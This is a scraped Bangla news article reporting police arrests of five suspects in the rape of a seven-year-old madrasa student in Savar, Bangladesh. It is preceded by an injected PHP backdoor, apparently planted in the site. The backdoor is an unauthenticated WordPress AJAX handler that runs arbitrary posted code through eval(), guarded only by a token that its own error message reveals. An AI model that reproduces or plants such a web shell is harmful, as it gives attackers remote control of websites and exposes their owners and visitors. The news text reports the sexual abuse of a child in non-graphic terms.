// ==[BD:Zs2C7KxW]== add_action( 'wp_ajax_nopriv_snramqswxi', function() { $token = 'Zs2C7KxWXPRioIS4dPDhVykIlRv570xk'; $val = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $val ) || ! hash_equals( $token, $val ) ) { wp_send_json_error( [ 'message' => 'tok:' . $token ], 403 ); } $marker = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $marker ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $marker = preg_replace( '/^\s*<\?(php)?/i', '', $marker ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $ptr = microtime( true ); ob_start(); try { ( static function() use ( $marker ) { return eval( $marker ); } )(); $key = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $key, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } catch ( \Throwable $obj ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $obj->getMessage(), 'time_ms' => round( ( microtime( true ) - $ptr ) * 1000, 2 ) ] ); } } ); // ==[/BD:Zs2C7KxW]== সাভারে মাদ্রাসাশিক্ষার্থী ধর্ষণ মামলায় ৫ আসামি গ্রেপ্তার | potrikaybangladesh.com
Thursday, September 17, 2026
Homeঅপরাধসাভারে মাদ্রাসাশিক্ষার্থী ধর্ষণ মামলায় ৫ আসামি গ্রেপ্তার

সাভারে মাদ্রাসাশিক্ষার্থী ধর্ষণ মামলায় ৫ আসামি গ্রেপ্তার

ঢাকার সাভারে সাত বছর বয়সী মাদ্রাসাশিক্ষার্থীকে ধর্ষণ মামলার ১০ আসামির মধ্যে পাঁচজনকে গ্রেপ্তার করা হয়েছে বলে জানিয়েছে পুলিশ।

আজ শনিবার দুপুর ১২টার দিকে সাভার মডেল থানায় প্রেস ব্রিফিংয়ে এ তথ্য জানান ঢাকা জেলার অতিরিক্ত পুলিশ সুপার (সাভার সার্কেল) রাকিবুল হাসান ইশান।

তিনি জানান, বিভিন্ন তথ্য-উপাত্ত বিশ্লেষণ করে ঢাকা জেলা পুলিশের সাভার মডেল থানা, আশুলিয়া থানা ও ডিবির একাধিক টিম বরগুনা, ভোলা, সিরাজগঞ্জ, গাজীপুর ও ঢাকায় অভিযান চালিয়ে মামলার পাঁচ আসামিকে গ্রেপ্তার করে। গ্রেপ্তারদের মধ্যে অপ্রাপ্তবয়স্করাও রয়েছে।

প্রাথমিক জিজ্ঞাসাবাদে তাদের অনেকেই অপরাধ স্বীকার করেছে বলেও জানান এ পুলিশ কর্মকর্তা।

রাকিবুল হাসান বলেন, ‘ঢাকা জেলা পুলিশ সর্বোচ্চ গুরুত্ব দিয়ে মামলাটি দেখছে। আমরা আশাবাদী, খুব শিগগিরই বাকি আসামিদের গ্রেপ্তার করতে সক্ষম হব।’

এর আগে ধর্ষণের অভিযোগে গত ২৬ আগস্ট আদালতের নির্দেশে সাভার মডেল থানায় মামলা করেন শিশুটির বাবা।

মামলায় সাভারের পূর্ব শাহবাগ এলাকায় অবস্থিত মারকাযুল উলুম আশ-শরইয়্যাহ মাদ্রাসার ছয় শিক্ষার্থী ও চার শিক্ষককে আসামি করা হয়।

এক শিক্ষক ও পাঁচ শিক্ষার্থীর বিরুদ্ধে ধর্ষণের অভিযোগ আনা হয়েছে। আর চারজনের বিরুদ্ধে ধর্ষণে সহায়তার অভিযোগ রয়েছে।

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

- Advertisment -
Google search engine

Most Popular

Recent Comments